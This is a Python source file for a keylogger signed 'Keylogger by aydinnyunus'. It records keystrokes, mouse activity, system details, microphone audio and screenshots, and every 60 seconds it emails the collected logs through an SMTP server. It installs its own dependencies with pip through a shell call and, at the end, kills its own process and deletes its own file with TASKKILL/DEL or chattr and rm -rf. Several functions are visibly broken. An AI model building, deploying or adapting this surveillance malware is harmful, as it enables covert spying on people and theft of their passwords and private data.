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import logging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import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import smtplib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import socket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import threading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import wave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import pyscreenshot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import sounddevice as sd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pynput import keyboard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pynput.keyboard import Listener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email import encoders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from email.mime.base import MIMEBase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from email.mime.multipart import MIMEMultipart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email.mime.text import MIMEText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import glob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except ModuleNotFoundError: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from subprocess import call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modules = ["pyscreenshot","sounddevice","pynput"]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call("pip install " + ' '.join(modules), shell=True)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EMAIL_ADDRESS = "YOUR_USERNAME"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EMAIL_PASSWORD = "YOUR_PASSWORD"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SEND_REPORT_EVERY = 60 # as in seconds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KeyLogger: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def __init__(self, time_interval, email, password):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self.interval = time_interval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self.log = "KeyLogger Started..."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self.email = email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self.password = password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def appendlog(self, string):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self.log = self.log +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def on_move(self, x, y):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current_move = logging.info("Mouse moved to {} {}".format(x, y))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self.appendlog(current_move)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def on_click(self, x, y):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current_click = logging.info("Mouse moved to {} {}".format(x, y))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self.appendlog(current_click)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def on_scroll(self, x, y):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current_scroll = logging.info("Mouse moved to {} {}".format(x, y))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self.appendlog(current_scroll)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def save_data(self, key):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current_key = str(key.char)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except AttributeError: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key == key.space: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current_key = "SPACE"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elif key == key.esc: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current_key = "ESC"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current_key = " " + str(key) + " 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self.appendlog(current_key)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def send_mail(self, email, password, message):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sender = "Private Person &lt;from@example.com&gt;"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receiver = "A Test User &lt;to@example.com&gt;"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 = f"""\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Subject: main Mailtrap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To: {receiver}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From: {sender}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Keylogger by aydinnyunus\n"""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m += message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with smtplib.SMTP("smtp.mailtrap.io", 2525) as server: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server.login(email, password)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server.sendmail(sender, receiver, message)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def report(self):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self.send_mail(self.email, self.password, "\n\n" + self.log)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self.log = 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timer = threading.Timer(self.interval, self.report)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timer.start()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def system_information(self):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hostname = socket.gethostname()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ip = socket.gethostbyname(hostname)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plat = platform.processor()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 = platform.system()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machine = platform.machine()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self.appendlog(hostname)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self.appendlog(ip)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self.appendlog(plat)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self.appendlog(system)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self.appendlog(machine)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def microphone(self):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fs = 44100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seconds = SEND_REPORT_EVERY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obj = wave.open('sound.wav', 'w')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obj.setnchannels(1)  # mono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obj.setsampwidth(2)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obj.setframerate(fs)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myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2)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obj.writeframesraw(myrecording)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sd.wait()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self.send_mail(email=EMAIL_ADDRESS, password=EMAIL_PASSWORD, message=obj)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def screenshot(self):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img = pyscreenshot.grab()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self.send_mail(email=EMAIL_ADDRESS, password=EMAIL_PASSWORD, message=img)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def run(self):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keyboard_listener = keyboard.Listener(on_press=self.save_data)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with keyboard_listener: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self.report()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keyboard_listener.join()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with Listener(on_click=self.on_click, on_move=self.on_move, on_scroll=self.on_scroll) as mouse_listener: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mouse_listener.join()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 os.name == "nt":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pwd = os.path.abspath(os.getcwd())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os.system("cd " + pwd)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os.system("TASKKILL /F /IM " + os.path.basename(__file__))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print('File was closed.')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os.system("DEL " + os.path.basename(__file__))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except OSError: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print('File is close.')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pwd = os.path.abspath(os.getcwd())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os.system("cd " + pwd)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os.system('pkill leafpad')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os.system("chattr -i " +  os.path.basename(__file__))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print('File was closed.')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os.system("rm -rf" + os.path.basename(__file__))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except OSError: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print('File is close.')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keylogger = KeyLogger(SEND_REPORT_EVERY, EMAIL_ADDRESS, EMAIL_PASSWORD)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keylogger.run()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